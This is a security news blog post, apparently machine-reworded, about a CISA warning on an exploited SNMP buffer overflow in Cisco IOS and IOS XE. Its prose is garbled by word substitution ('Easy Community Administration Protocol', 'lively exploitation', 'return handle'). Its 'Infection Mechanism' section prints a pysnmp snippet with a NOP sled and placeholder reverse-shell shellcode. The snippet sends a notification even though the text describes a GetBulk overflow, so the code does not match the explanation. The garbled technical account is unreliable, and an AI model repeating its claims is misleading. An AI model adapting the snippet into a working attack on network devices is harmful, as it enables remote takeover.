Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

CISA Warns of Cisco IOS and IOS XE SNMP Vulnerabilities Exploited in Attacks

Posted on October 1, 2025October 1, 2025 By CWS

Cisco’s Easy Community Administration Protocol (SNMP) implementations in IOS and IOS XE have come beneath intense scrutiny following studies of lively exploitation within the wild.

First disclosed in August 2025, CVE-2025-20352 describes a crucial buffer overflow within the SNMP engine that permits unauthenticated distant attackers to execute arbitrary code.

The vulnerability arises when an outsized payload is shipped in a GetBulk request, overrunning an inside buffer and redirecting management circulate to attacker-supplied shellcode.

Preliminary indicators emerged when community operators started noticing unexplained machine reboots and anomalous SNMP site visitors patterns.

Subsequent forensic evaluation revealed that compromised routers have been pinging exterior command-and-control servers instantly after dealing with malformed SNMP requests.

CISA analysts recognized this habits inside weeks of the vulnerability’s public disclosure, warning that adversaries are leveraging CVE-2025-20352 to determine persistent footholds in enterprise networks.

The influence spans a variety of Cisco platforms, from ISR 4000 Sequence routers to Catalyst switches operating IOS XE variations previous to 17.10.

Exploitation requires solely community reachability to the SNMP service and no legitimate credentials, making uncovered administration interfaces notably harmful.

In a single reported incident, attackers deployed a customized payload that established a reverse shell again to an attacker-controlled host, enabling full distant management of the machine.

An infection Mechanism

Beneath the hood, the assault leverages a malformed PDU that triggers an out-of-bounds write within the SNMP engine’s stack.

Upon receiving a GetBulk request with a size area exceeding the utmost buffer dimension, the SNMP handler fails to validate the message dimension.

This overflow overwrites the saved return handle on the stack, diverting execution to shellcode embedded within the packet.

As soon as execution begins, the payload initializes a socket connection again to the attacker’s IP handle:-

from pysnmp.hlapi import *
payload = b”x90″ * 100 + reverse_shell_shellcode
sendNotification(
SnmpEngine(),
CommunityData(‘public’),
UdpTransportTarget((‘192.0.2.123’, 161)),
ContextData(),
NotificationType(
ObjectIdentity(‘1.3.6.1.4.1.9.9.96’),
(‘1.3.6.1.4.1.9.9.96.1.1’, OctetString(payload))
)
)

The packet construction highlights how the outsized size area and embedded shellcode mix to hijack execution.

Community defenders are urged to use the newest Cisco patches instantly and to limit SNMP entry to trusted hosts solely.

Observe us on Google Information, LinkedIn, and X to Get Extra Instantaneous Updates, Set CSN as a Most popular Supply in Google.

Cyber Security News Tags:Attacks, CISA, Cisco, Exploited, IOS, SNMP, Vulnerabilities, Warns

Post navigation

Previous Post: MatrixPDF Attacks Gmail Users Bypassing Email Filters and Fetch Malicious Payload
Next Post: OpenSSL Vulnerabilities Allow Private Key Recovery, Code Execution, DoS Attacks

Related Posts

Microsoft Copilot Rooted to Gain Unauthorized Root Access to its Backend System Cyber Security News
10 Best Secure Network As a Service for MSP Providers Cyber Security News
10 Best NGINX Monitoring Tools Cyber Security News
CISOs Playbook for Managing Boardroom Cybersecurity Concerns Cyber Security News
Mustang Panda With SnakeDisk USB Worm and Toneshell Backdoor Seeking to Penetrate Air-Gap Systems Cyber Security News
What is MCP Server – How it is Powering AI-Driven Cyber Defense Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Microsoft Warns of Hackers Abuse Teams Features and Capabilities to Deliver Malware
  • Why Threat Prioritization Is the Key SOC Performance Driver  
  • BK Technologies Data Breach – Hackers Compromise IT Systems and Exfiltrate Data
  • BatShadow Group Uses New Go-Based ‘Vampire Bot’ Malware to Hunt Job Seekers
  • Google’s New AI Doesn’t Just Find Vulnerabilities — It Rewrites Code to Patch Them

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Microsoft Warns of Hackers Abuse Teams Features and Capabilities to Deliver Malware
  • Why Threat Prioritization Is the Key SOC Performance Driver  
  • BK Technologies Data Breach – Hackers Compromise IT Systems and Exfiltrate Data
  • BatShadow Group Uses New Go-Based ‘Vampire Bot’ Malware to Hunt Job Seekers
  • Google’s New AI Doesn’t Just Find Vulnerabilities — It Rewrites Code to Patch Them

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News